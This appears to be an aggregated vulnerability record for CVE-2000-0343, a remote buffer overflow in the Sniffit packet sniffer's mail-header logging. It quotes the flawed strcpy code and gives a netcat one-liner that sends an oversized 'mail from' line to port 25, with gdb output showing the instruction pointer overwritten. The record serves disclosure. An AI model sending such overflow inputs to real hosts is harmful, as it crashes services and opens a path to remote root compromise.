CVE-2000-0343 (CNNVD-200005-011)
中文标题:
Sniffit处理邮件头缓冲区溢出漏洞
英文标题:
Buffer overflow in Sniffit 0.3.x with the -L logging option enabled allows remote attackers to execu...
漏洞描述
中文描述:
Sniffit是一个常用的sniffer工具。可运行在多种Unix/Linux平台上。 它存在一个缓冲区溢出漏洞,可能导致攻击者远程获取root权限。 Sniffit在使用"-L mail"参数处理窃听到的邮件头("mail from:"和"rcpto to:")的时候,会将它们拷贝到一个固定大小的buffer中,导致可能发生溢出问题:问题处在下列两个地方: if(strstr(workbuf1,"mail from")!=NULL) { char workbuf2[MTU]; strcpy(workbuf2, strstr(workbuf1,"mail from")); 和 if(strstr(workbuf1,"rcpt to")!=NULL) { char workbuf2[MTU]; strcpy(workbuf2, strstr(workbuf1,"rcpt to")); ... 当用户对局域网内任意主机的25端口发送包含超长"mail from:..."或者"rcpt to:..."内容的消息时,将会导致监听主机上的Sniffit发生溢出: echo "mail from:`perl -e 'print "A"x300'`"|nc -vv HOSTNAME 25 在运行Sniffit的机器上用gdb跟踪得到的结果: Program received signal SIGSEGV, Segmentation fault. 0x61616161 in ?? () (gdb) i all eax: 0x0 0 ecx: 0x8057648 134575688 edx: 0x8057648 134575688 ebx: 0xbfff5b84 -1073783932 esp: 0xbfff47a4 -1073789020 ebp: 0x61616161 1633771873 esi: 0xbfff6f0c -1073778932 edi: 0xbfff6f0c -1073778932 eip: 0x61616161 1633771873 ...
英文描述:
Buffer overflow in Sniffit 0.3.x with the -L logging option enabled allows remote attackers to execute arbitrary commands via a long MAIL FROM mail header.
CWE类型:
标签:
受影响产品
| 厂商 | 产品 | 版本 | 版本范围 | 平台 | CPE |
|---|---|---|---|---|---|
| brecht_claerhout | sniffit | 0.3.6hip | - | - |
cpe:2.3:a:brecht_claerhout:sniffit:0.3.6hip:*:*:*:*:*:*:*
|
| brecht_claerhout | sniffit | 0.3.7beta | - | - |
cpe:2.3:a:brecht_claerhout:sniffit:0.3.7beta:*:*:*:*:*:*:*
|
解决方案
中文解决方案:
英文解决方案:
临时解决方案:
参考链接
cve.org
cve.org
exploitdb
exploitdb
cve.org
exploitdb
exploitdb
exploitdb
exploitdb
CVSS评分详情
AV:N/AC:L/Au:N/C:C/I:C/A:C
时间信息
利用信息
数据源详情
| 数据源 | 记录ID | 版本 | 提取时间 |
|---|---|---|---|
| CVE | cve_CVE-2000-0343 |
2025-11-11 15:17:19 | 2025-11-11 07:28:52 |
| NVD | nvd_CVE-2000-0343 |
2025-11-11 14:50:25 | 2025-11-11 07:40:57 |
| CNNVD | cnnvd_CNNVD-200005-011 |
2025-11-11 15:08:38 | 2025-11-11 07:48:44 |
| EXPLOITDB | exploitdb_EDB-19886 |
2025-11-11 15:05:28 | 2025-11-11 08:15:16 |
| EXPLOITDB | exploitdb_EDB-19887 |
2025-11-11 15:05:28 | 2025-11-11 08:15:16 |
| EXPLOITDB | exploitdb_EDB-19888 |
2025-11-11 15:05:28 | 2025-11-11 08:15:16 |
版本与语言
安全公告
变更历史
查看详细变更
- references_count: 7 -> 9
- tags_count: 5 -> 6
查看详细变更
- references_count: 5 -> 7
- tags_count: 4 -> 5
查看详细变更
- references_count: 2 -> 5
- tags_count: 0 -> 4
- data_sources: ['cnnvd', 'cve', 'nvd'] -> ['cnnvd', 'cve', 'exploitdb', 'nvd']
查看详细变更
- vulnerability_type: 未提取 -> 授权问题
- cnnvd_id: 未提取 -> CNNVD-200005-011
- data_sources: ['cve', 'nvd'] -> ['cnnvd', 'cve', 'nvd']
查看详细变更
- severity: SeverityLevel.MEDIUM -> SeverityLevel.CRITICAL
- cvss_score: 未提取 -> 10.0
- cvss_vector: NOT_EXTRACTED -> AV:N/AC:L/Au:N/C:C/I:C/A:C
- cvss_version: NOT_EXTRACTED -> 2.0
- affected_products_count: 0 -> 2
- data_sources: ['cve'] -> ['cve', 'nvd']